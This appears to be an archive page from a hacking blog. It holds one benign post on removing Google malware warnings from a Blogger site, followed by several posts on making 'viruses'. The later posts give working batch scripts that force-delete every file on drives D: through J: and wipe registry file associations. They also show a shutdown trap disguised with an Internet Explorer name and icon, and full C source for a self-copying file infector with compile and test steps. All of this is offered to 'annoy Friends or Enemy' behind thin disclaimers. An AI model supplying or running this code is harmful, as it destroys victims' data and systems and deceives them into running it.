Unordered List

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Friday, July 5, 2013

How To Remove Google Malware Warning From Our Blogger / Website

Friends, Now i sharing a valuable post to remove suspicious link and content from our blogger/ Website. My blogger also affected with some links, because Google shows my Blogger is harmful. I cant recognize, what problem affected in my site. I also search on Google Webmasters Tool. But it not shows any warning. Only Google Chrome shows some warning. Because of these reasons my website ranking decease every day. After some days I got a website to find and reveal what problem affected on my site. Now i share how to remove malware content or link from our blogger . Follow this post and enjoy with Master Hacks..

Google Chrome Shows Harful content (www.masterhacksindia.blogspot.com)

 

 

  • Paste your URL and hit submit button.

Redleg's BlogspotBlogger Tool online malware finding software(www.masterhacksindia.blogspot.com)

 

  • Wait 2-3 seconds. It will redirect  another page. It shows what problem affected on your Blogger/Website.

Find Problem affected page (www.masterhacksindia.blogspot.com)

 

  • Click on Located here link. Now shows  full script of our blog. Red line shows  content is harmful.

Problem finded (www.masterhacksindia.blogspot.com)

 

  • Find that code from our blogger/website. Please check Page elements OR Templates.

Now i find What problem affeced on my blog. I removed it(wwww.masterhacksindia.blogspot.com)

 

  • Remove it.  Now site is clean .enjoy….

 

 

 

Leave a comment below. about master hacks…..

Sunday, November 18, 2012

How To Make Poison Virus In Notepad

Friends, Here i share some tricks about make virus in Notepad.  This is a simple trick .
It can be used to annoy Friends or Enemy.


This Virus would ask to choose a number between 1 - 5 and then do a certain action :

1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown.

If you want to make this simple virus follow these simple steps :


  • Open Notepad.

  • Copy and Paste the following Code into Notepad :




  • Save it as PoisonVirus.bat

Make sure ,Your file extension like .bat







Leave your comment……………………



Saturday, August 4, 2012

How To Make Dangerous Virus with Notepad.




Hi followers,this is a special post, It contain “how to make a harmful virus with notepad”?.




USE THIS TRICK FOR ETHICAL USE ONLY



1. At first open Notepad,Then copy below code and paste it.
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save it as Entertainer001.bat and the batch file is created . Without .bat extension it will not work on your computer.



OR


2. Open Notepad,Then copy below code and paste it.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Save it as Entertainer.bat and the batch file is created . Without .bat extension it will not work on your computer.





Do not  use this on your computer.


.................................END.......................................

Thursday, April 19, 2012

How to make a simple Trojan Virus

Want to make fun with your friends with doing a simple hack on their computer…YES, Now let us learn how to make a simple Trojan Virus in the PC and believe it really doesn't harm the PC as it is just a simple hack but just running that file make your PC to shutdown. So, What are you waiting for…just follow the steps and have fun..

STEPS:

  • Right click on Desktop.

  • Go to NEW>Shortcut

  • Type in Location shutdown –s –t 50 –c “Trojan Virus Activated”

  • Click on Next.

  • Type the name whatever you want to give it such as Internet Explorer.

  • Click on Finish.

  • Congratulations your new hack is ready to work.

  • If you want it EXTREMELY convincing to the user just right click that file.

  • Go to Properties>Shortcut>Change Icon.

  • Choose an appropriate Icon so you can make the user to RUN that file.

Now by just Running that file the System will be forced to Shutdown. It is not harmful for your PC it is just to have fun. By deleting that file you can make your PC normal as before…I hope that you will try this hack and find this interesting.




Monday, April 16, 2012

How to Create a Computer Virus?

 

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

 

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

 

 

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE